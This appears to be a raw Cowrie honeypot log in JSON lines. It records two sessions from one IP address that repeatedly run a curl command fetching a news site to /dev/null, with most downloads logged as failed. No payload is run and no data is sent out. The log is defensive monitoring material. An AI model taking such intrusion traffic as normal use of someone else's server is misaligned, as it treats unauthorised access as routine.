{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.522377Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.525033Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.526120Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.564017Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.565347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.567415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.568534Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.570798Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.576513Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.610523Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.611485Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.614468Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.616804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.617826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.619547Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.651950Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.653455Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.655435Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.660271Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.661843Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.693899Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.695114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.698108Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.699682Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.733224Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.734466Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.737725Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.740414Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.741295Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.758282Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.760677Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.776930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.778160Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.780517Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.781760Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.898121Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.899887Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.901986Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.920120Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.921756Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.937984Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.939307Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.942045Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.942906Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.977314Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.982851Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.991703Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.992919Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.995796Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.996830Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.002398Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.032201Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.033329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.036573Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.037832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.040864Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.062747Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.071558Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.072754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.077618Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.078602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.094141Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.108050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.109298Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.115232Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.121782Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.123001Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.148846Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.150042Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.164052Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.165210Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.187485Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.189457Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.193028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.194515Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.206999Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.208263Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.230134Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.231427Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.233898Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.236919Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.245096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.246242Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.278098Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.279251Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.290700Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.292008Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.313211Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.314389Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.323367Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.324965Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.360591Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.362128Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.366013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.367028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.382957Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.384031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.398402Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.401365Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.425782Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.427031Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.433099Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.443736Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.444847Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.456378Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.486152Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.504371Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.505568Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.513531Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.514465Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.515477Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.536347Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.539504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.540447Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.555810Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.556857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.564823Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.579657Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.580786Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.582267Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.617360Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.618696Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.637080Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.638077Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:04.662247Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:04.663385Z","src_ip":"212.227.125.160","session":"7541ed730449"}
